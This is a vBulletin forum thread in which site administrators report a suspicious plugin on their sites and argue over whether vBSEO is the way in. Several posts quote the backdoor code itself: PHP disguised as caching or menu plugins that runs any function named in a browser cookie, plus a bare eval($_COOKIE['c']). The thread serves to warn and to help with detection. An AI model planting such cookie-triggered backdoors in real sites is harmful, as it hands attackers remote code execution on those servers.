Announcement
Collapse
No announcement yet.
Possible Exploit
Collapse
X
-
Ace, sorry, I disagree. They somehow are attacking the title replace feature to INJECT code. It IS a vbseo hole.. We are narrowing it down...
-
If this is the exploit that causes Google searches to redirect elsewhere (a-la filestore.info), the reason vBSEO gets targeted is because it's designed to increase search engine crawling.
How they got in is not a vBSEO hole, but more than likely, people not securing all of the writable directories that vBulletin has to offer.
Leave a comment:
-
I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:
eval($_COOKIE['c']);
Here is a site that references a PHP compromise with similar code...
http://translate.google.com/translat...26prmd%3Dimvns
Leave a comment:
-
Just confirmed with 3 other peers in the field. All with vbseo.. People, check your plugins!
Leave a comment:
-
Just got confirmation from a peer that it is on their system too.. The only common thread we have right now is vbseo..
Leave a comment:
-
I have just checked a site of ours without vbseo, no exploit. I then checked a personal site of mine that has nothing to do with the other sites and it has vbseo.. The exploit was there. Not a 100% confirmation by any means, just so far out of 20 something sites that I have checked, the one that doesn't have vbseo is not infected. I have quite a few more to check.
Leave a comment:
-
Actually I more... This one in the same hook location, different site:
Code:/* vBCMS Global Thread Cache */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
Code:/* vBulletin Dynamic Menu Filters */ (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
Leave a comment:
-
Possible Exploit
I noticed this plugin in global complete on several of our sites:
PHP Code:/* vBulletin Templates Cookie Caching */
$vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10);
http://www.vbsoporte.com/f29/posible...oso-foro-2866/
All of our installs are running the latest version 3.8.7 PL2. I am going to all the sites and am disabling it as I find them. I have no idea if this is a VB exploit, or vbseo, or any other product we may have installed, but I suggest everyone check their plugin list.. This is installed under the vbulletin product, so it should be right around the top of the list. Still investigating..Tags: None
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Leave a comment: